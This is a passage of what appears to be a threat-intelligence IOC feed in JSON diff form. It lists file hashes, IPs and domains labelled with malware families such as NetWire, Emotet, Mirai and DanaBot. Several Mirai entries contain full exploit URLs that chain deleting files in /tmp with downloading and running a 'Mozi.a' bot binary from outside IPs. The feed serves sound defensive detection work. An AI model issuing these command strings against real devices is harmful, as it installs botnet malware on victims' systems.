"d9cb3f50723300775bccbac6b0322f44d8bfcd56", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274556048659, + "hash": [ + "79cb67d91b61383c67ae058f933995b6", + "1d211f00d1bf0a9ed75e8eb342368f3a73e0d3e4", + "25c2eb2304075061c1291cedd4bc150640c3ff7ea8133d4ca2c2abd5b38b92d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "99765b20af5a0dfea9433be1bad299564e7d5567", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274557554591, + "hash": [ + "991075dd7f0e60080f049fced9ea01e8", + "13f7f687922a96fb59e83e466d40f77cfc3a5992", + "5ff2541be1187a87513dc6ee33f74b5d97bb91500deba2fa3a24600c09647eb3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "080c45e15abc85506803b0b534d0c8763d326312", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274558517695, + "hash": [ + "0959e07315a3cdea9ebfeceebcb64580", + "fb2fd9609568a5173b9d58637449483fce90dd3c", + "3b9d6ed3864f72ac5bfc16c1f42fb36018c8a74b113c0b879f4122ee6f788cd2" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "35f0fd7fd26e212ec8d9e07d091c9f675225da8d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274558520816, + "hash": [ + "9b873afa3111bab0dcf46b9ceea91937", + "fb81cab156db106498b909ff8b362be757af4df8", + "a0300f9c01c52e05c18e9209748718cc77697d76f411155a9812d7e97937f05b" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "f3e6a58b8745ebea2aa90379988e773824d4bb4c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274559188265, + "hash": [ + "308def1e38b21f94e069bee9f415dd43", + "8401f0d96d42c2fc786b88eaeb05cafd2777abe5", + "af4d4686f55036da13704b5ce46fde446bb9dde60b9c66b3af13daa106211b1a" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "edfb8bbb918907f2f6ebc87fdf5c8a8ab46a267c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274559192152, + "hash": [ + "76c9a6535828cc91fa41b8468a3f1578", + "7cc14b0c5846be808647b363da608c4db2a0740d", + "d8944970d80375267cc3c3dbcd69855807ca9f1e101cd14b321321a795d0339c" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "83c54e8e2a91ec293ab3d40e1f774fb103069b69", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274565535559, + "ip": [ + "139.162.132.120" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "bc416b7f9d52c9add23614252d0ce75469f3598a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274570530356, + "hash": [ + "ed1b4fe03fcbae4439b5f0e4a85b8178", + "1148d83279b0c558f95e55bc2ff51cd32f2420d8", + "8d13f2de011a85ae5352f782a8170f4ea99ecb59ee2cdd8f47942f4321998f4d" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "5dce64781cc69f12726031651620e13fe7542d06", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274570533559, + "hash": [ + "cf166ac5a4b2e4fd3d9fe2d736d1c9c3", + "20dad98a2c9658e77f199f5cfaa155c767819603", + "cf50e86257c005936b7cbf1628a85b85b313e90a2e59bab04a6c53c22785dd27" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "dce63df66d9aafefee75a7f9de12c1b74b32b013", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274570537186, + "hash": [ + "c3c2a0dd0abc9b2ac552789d38b87ce1", + "262ed236dfb84bd1701031e2bf3d1cfd34ffbc54", + "9cc267108819c49fa1814955f6f93a451016f5d6c35bc3c90d30ce446be0f9c3" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "9171356831031ba15736f161d0103d3a6836dfd7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274570540692, + "hash": [ + "d5df7ec794b00a9758287c57beabe2d8", + "295faed809dd51d5955e5fe42d4665914ea15324", + "aa49190832a29956065fd891219cbe2555c82bcd53338848591c94e18598f1c7" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "939d51d56e697f29afef79eee28d7dfeb14947c1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274570543703, + "hash": [ + "32008d0fb6fe816dabfd0775f603a1e6", + "2a574124ee0039ca6dcc865e525a5fa448512eee", + "9f9a61aac70b6fedb23904cba692fabf8d465ca784c0317057ea7fcb575c90e8" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "729e33aecc7ea6a9814a9667bb5ad25cc917ff34", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274573337462, + "hash": [ + "c1ad74d38d57d2403ee3afb74d8a41bb", + "19b02cdea5e944db5216d2a35f236afa77e934bf", + "c99d5e18e37cce5f6af1ae50fc29b3815f6b07e24c73822d66daa9f9ad249656" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "c8f69f2e46521ef2591fcdf0bd107171e5a0ed97", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274573341640, + "hash": [ + "e791f3600b7dcb470c11dc8edf6924cc", + "1a0ab24842d8626670841f12b676ebd7b0f133bf", + "3ee64f7e26d57505d85fb580d0864cce15fa455043999a4498a7665c34b094a8" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "b2274c704605c1138c2515501c8d143cc72bfa10", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274586464093, + "hash": [ + "009855d959f187061bcc2b6343bcc20c", + "359f818868a08eaa10c0476c8506cb92aa19418e", + "a8d6a1f3e9d77030c4f2b3ab44619862123d90027100315691a74bf7ce33c332" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f20f425662cfa1ca082a949ffc54b0bfa1e01f6d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274588693486, + "hash": [ + "b1e932fb59a5718652da0ed6319ffb2b", + "43c21b5cc5b34842cd39e4b43a9cbe04ccca82dd", + "6b9d84368a7f6100e45ff023be91838598cfba5a9dab35e7db3be595f2c82bf4" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "c3edbd45969d9368b51ada453ba651d12fef5320", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "sxm.carrental.okaseo.com", + "seqUpdate": 17274588887356, + "malwareList": [ + { + "name": "Emotet", + "aliases": [ + "Emotet", + "Geodo" + ] + } + ], + "threatList": null + }, + { + "id": "ea435f96d05f31d257dc3ec569b872966d476085", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274595244072, + "hash": [ + "3a7442785c895ddd05b6dfd53fa113c6", + "568f040b81a5c770557dc887f9c43b705f2aaa9b", + "656d548fe93ed11521dc0ab00ab2139655c52636aa767c824638c8c44d5b5366" + ], + "malwareList": [ + { + "name": "Locky", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d43c8a096f0f2f705ac7cc7ee98bd32a814cb71f", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274597178873, + "hash": [ + "67016a1b7e40ff82cc277fa0240e9cc9", + "484a30ace28810a4735a9a5649933a3b4d19ad5d", + "2fca3e7e31e3105f822a618e52f48429d332a1a2721b58ce9cd350a194d407ae" + ], + "malwareList": [ + { + "name": "BackSwap", + "aliases": [] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1fe592c5915f18535ffad92b1e6c89454b56050d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274597314972, + "hash": [ + "af1b7a6904a1bced92089c7fd45f13b0", + "0161638df8519595663d4956f09d38a504ba9692", + "d33e9ef79b8c61d4c66589a6be6415b5df29f36495dbb24bda2e499d92de6eac" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4bd61d3804702b3287743c631259328ed3dfbd6d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274598557591, + "hash": [ + "27e18be58849bfc3ab8488d9ec4099a8", + "526f423094d650c057636c6747d8255e394c4263", + "c98edac896896ad536923fc022f19b5bbe35bb477a209312090953174683dceb" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "d7c0a40a9f61a5f7d930f8f330cf2bcb9993ba93", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274599405665, + "hash": [ + "bce2d7723f8c3fb9e85df932a39e8f9c", + "5e135ccc0809ba0e625b8345366b74a7f0a77742", + "c2d44fcb0eaefe9a5020d1f9b14d8e0293f16fe5ca6f97299499c67185fa0538" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4d67125c95738488e0bcae38d9cbfea092cf1ed9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274601344307, + "hash": [ + "9a8af0801e886bf24d43f708be27f5b1", + "4c57e069de8bb743beffee106a0b5aed7479443f", + "8f00c7bbb7c2f109035b055a8d1797eff0153bf052901b51c95259cbf351b6be" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "baeb867c3475cbf138956248403cadd5885071fa", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274620040105, + "hash": [ + "0e4c248dd136ff4d2b04613df918960d", + "6a08f2bc8c0fc7a3da9c69c2cbb12d44858543ec", + "a3bd5d0f0762dc9d54517e4f7e100bad6ace415a204258d73d42a728cd52e446" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "67777845142b854838df8fe3eb55669e48e56ac4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274622688466, + "hash": [ + "4ae9025afb6749d9edc7d73125575412", + "5f43ef474a05584d1b0cb35656cca0fc52e610c5", + "62b5b0fb4c78494149a36c38f7d667df6d7440334f65fb92e1196e62d336e8e7" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "13e254f03f4ee2ea2fce928e66019b8fd091dbdc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628049456, + "hash": [ + "dfabaf787bb82c68b5789e7da105c037", + "e5543a0ab3d37f27ae22a72c1ffe3e54db6e9f78", + "fad32ae5e109b0550b2912c91bed3f94975e1e1a4a8ba21214a405ddc6239d37" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5e4dfa5f52d9dda5a368c5814e4de62788eae8c6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628053171, + "hash": [ + "993da97a4d3f3c70b6a76640581cc3ef", + "e5e0ec29c58399a9e85018d63984d88a7da70309", + "f8d98171a6b845b37a7efe2d56d9b16f44b01e83e9078ad879e26620e79d9d8e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "64e49c7724841df08715280c4d29253d243daeb8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628056291, + "hash": [ + "5e192d59450f5ada7ea858703dc1e443", + "e7bce2793d8663d7beee0fcc9810c91c6a46f6d2", + "4fe96ee37f0c28cdb4831b4c984a3724f8519e9af7fd3558f70f3b446aa66936" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ca6aac48432fdb66bd482dd8a0fbbadd1fad03a0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628059816, + "hash": [ + "7521b09ebd27f2fdc3b896fef4f357de", + "ee7bb15a82af7f3dd0707b18a022994a955f524b", + "58c37fb2ed0022929bf9ae357cf019014c826163bb38b7a3586c5c4bcb920d14" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f64ac32ab2820a2008bbae6b49bc9cb81c4d1586", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628063283, + "hash": [ + "b9e53aadb23d12809ff91c2618c4ed85", + "fb74e22ee85ae72c0ca2e06f885db8ab6150e267", + "580e3d5c0f563e2248898a64df44c77488b7b2852e52c231350a25278a071b8d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "09afb4ad2a14d2efc1a6685115bf1f3293a965e5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628065808, + "hash": [ + "94d95608ccbf21b51b07b706d57fc8e5", + "fc8c18172fc11cbaa5c58e497bd38d6d77b4a500", + "703653d5667d0936f2842f7dac7be8c3e5e7ac962b743238c0a4f6e54d6589f3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ff7ce33dc382ee561cfb56ac5f9b02090e523029", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628068779, + "hash": [ + "d49d899db62c8d40771401becdc0a0bb", + "ffd6acd61a8b8147cff99d1f006b3190b57a7d6a", + "610355bd033fcd5718a4b56d5a95d245d4c58f6e25443e31436b4677fd7dad44" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1bb9a5d2e713a2aed282e27de6524911afb9d5f6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628071745, + "hash": [ + "23dec0df10a1481d1375661487adc67e", + "25bb46d226395c724b6b9c55f543a596fc4abc36", + "0b211557967e97830c0b7f78c76dd334c795b6aaf539f09d98795b4ae92f57c3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3bb9d62cffc2fd66a8e484039ef392759fa8818a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628311035, + "hash": [ + "cfdffe2979dc245ab90200af8d359314", + "27f8881574c529f202ba73afe7fb9e9db75ffe2e", + "65bfdba87dacbda214336deab9153bba0b4c415ef67bc26de5f27a48784c5e22" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e75cdb59069374ef816b62e10c30a2e969ac06d4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628314734, + "hash": [ + "045ca76f58da12b443e69d5ca25b1f98", + "428e3a4014b7236cddecbd0359f8928561c79e8d", + "6e72bcc32404e35d254aef579dcfc2847e1ae87c8d93303742cbb12044c3a7bb" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3c57c8bf197ca7961216128319dc051bd1bd4f28", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628318414, + "hash": [ + "bd47733330552355e41a2d1710d291c2", + "558972857449c6a61e7d0588d5348a3d8a71d67a", + "28b14dee93a3f8f14613778418d6ab0eaf2ae8edb12fbd231d6b694331ee8121" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ab0eec09fbafdc3a301ab7460c8af656c15237d2", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628321743, + "hash": [ + "9d0a82c33ff52168c40c357dc59aaca5", + "56d2692ec047a0341e612af0eaab8ec5df31a27b", + "0b0218bd394c6d8ce3b028e6e367a3398f1ed814831664ceffa5b5dd036bd112" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6abfe8fd95e34fca1ddcd90ccf61239ea4eb5c7a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628325506, + "hash": [ + "ba4c53d837293773b55690bd825fc9cd", + "5ea9860717085df270ceb887d13b46b76ba96ad4", + "620abcac703ec01dcbc11a696b5bff2a50a8d39db8b3f48f03944b427a75cd98" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7419d555dea6436691ee5bcffef215a0d75eeb95", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628328731, + "hash": [ + "e6785d7bfe681dcf6cabfec4638f3b6a", + "61c367911a857ce08032fac2805651baabf16c01", + "71fb9fdbef50789676876966e06e53bb4a2e55e331d872036e0be33e07352454" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6deb7fd29d5f871e98f11e13e9a72d6f8e35379e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628481924, + "hash": [ + "35cc29e499e5c9ba981d31ea0ff25866", + "6d68e9e9c694fbc79df8392abaea8a913907c63f", + "69534f09f21e5f4a233c507efeafd1ee284c4d1592e4109fb9d36988beaafd75" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "63073589a70564fb45187772042cce5a1cb9be35", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628484520, + "hash": [ + "7f9db0f57c7e0e06c1872c61254f0ad0", + "71002fc6d6c9881ce1e7069990f4194eb468d84c", + "798102a4c6944ccd8658d504f80a90e4f9d16f62cdd34a50e246843f81aa70d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4119749b2c65f3202734a6df679c58c2bc1ca784", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628553917, + "hash": [ + "bc1c661342f8a818a8532f33dff7fd2f", + "71b3162ba3c694247cc708ef9793573dc16eb637", + "83e9e6a6eb1f1c5675ec8036dd98b475abb2309827c8183177b7db5376b99b17" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "25cbfb399c8a3640dbd96f84236a6305ac415853", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628634333, + "hash": [ + "c1b8b1aaa3dc54cbd0566ab50231d772", + "7d67dadc9071a7449bcf184079444e1398d3c812", + "7943fb777cc2134f316c3685ef1cb2240605f34d25bc5b0544adb42fd9a714ff" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2e193b35fff3a4c43a6e9400bc2f685949ec9b2d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274628638165, + "hash": [ + "91c448ad4897be9368f3269aadae0e38", + "83164900dba44a6d6d1585777f1c7eb326f0c523", + "341a0f68b55ede24a9f88e6dc5ba3221b747306ea177f1a6aee005e2a4389ebf" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "651159ceb7a455a39ae5ef779cd008dba64e5f01", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274630602548, + "hash": [ + "4c521942d21db87374f61e62f0b557b5", + "870e9ddb5e4b5e0b90b385363b45e7c1d05d713f", + "5e01b38f38f5ad5ec23a93cd86c80d2e355946a7138588c15a4c49cb0ea5d42b" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e95f83a5a3435858542896395dabb8aea3dd7091", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": "http://194.143.143.236/shell?cd+/tmp;rm+-rf+*;wget+http:/60.212.100.250:51187/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274631280626, + "ip": [ + "194.143.143.236" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f15c60ffc812ffa530679fac904a68e907ca70db", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "gitlab.medicaltech.it", + "url": "https://gitlab.medicaltech.it:443/shell?cd+/tmp;rm+-rf+*;wget+http://60.212.100.250:51187/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274631280626, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8daf92ef3e5e1e08adbc61a584b850acc7b7badc", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274631281504, + "ip": [ + "60.212.100.250" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9677bfc97bf8faf90b7908d483fbe45674d406aa", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": "http://185.186.93.108/shell?cd+/tmp;rm+-rf+*;wget+http:/222.141.141.125:52573/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274637080848, + "ip": [ + "185.186.93.108" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cd94a0d76428aa29c584a7c1f1177c9aefd51b3c", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274637081839, + "ip": [ + "222.141.141.125" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d268d177d3eaa8a762a550a4168ed2fba8b7e104", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643621696, + "hash": [ + "9a011f3742f2abf9c08981d5bc606c3a", + "1ba8369b2cb49e3f97f96f0b8c3090078679a23c", + "4a49274ba0992fd36cf1efb077c337c2a3f662435c665f43e8f59993531cab6b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "88beda4cb3d9d08017939e4156c7a39cc411e788", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643624647, + "hash": [ + "b8a2cddf223ca1349d8b1a8ce5773aa6", + "25954b1ba1af4f2abfe9174084b5797a7b05229f", + "8eca37910e92d14bd4b42bec9211c8411aebd3b1c1754c423a0b7447bfdcc609" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "024fbe8bfb691522b4fd0c990db709d61aad329e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643626781, + "hash": [ + "3260463ebf7ed1ca893219d0aef294a2", + "270b222cab7df95433d22d59a18e593dda139178", + "d0abea4bc3c234bb059c4fe4c5ba1875714261e5f4c2934ea9b6a25fc1c9e6c4" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6a9113373b29acbe5f9edc1e91c30279ba97cd01", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643629709, + "hash": [ + "345b4276ffa1ee17206e13a6c00eea95", + "2fa1c15a8b515d1222b2308eefaa746172a1256c", + "be471e29cc39bf5a2977535fa4ada21873531b952dfa752c8ea8e25352a8339d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c4ccea7d6732b3a8b96a676f0c658cf29741ca1d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643632592, + "hash": [ + "e3f3b29f2773f0ac506294a758a34583", + "4e5fea1610b0e1d7670fe59da668b65336c50452", + "9d946bbbfd0a7e9ef1676bb66f94b3057f3198c814ef016118379d258d8469f7" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b0ac64db895d260df54fb640f96723d9f5ca3ac0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643635756, + "hash": [ + "b7ea0cc99f8ab32b38b186e040792299", + "555ef478ea5dcff6cf0c61083f5db259ec94524c", + "2f0de6e46571a3669485bae98a8b10a827ade39ba924d6431a4c3b87ccf3834a" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9ceee73410b1d3082a58974cc0d6a54e24b57277", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643639223, + "hash": [ + "c40019fa7a09075331f41560144b9fed", + "79a91c780b9d9b0cace57b80ee43fe78de03e823", + 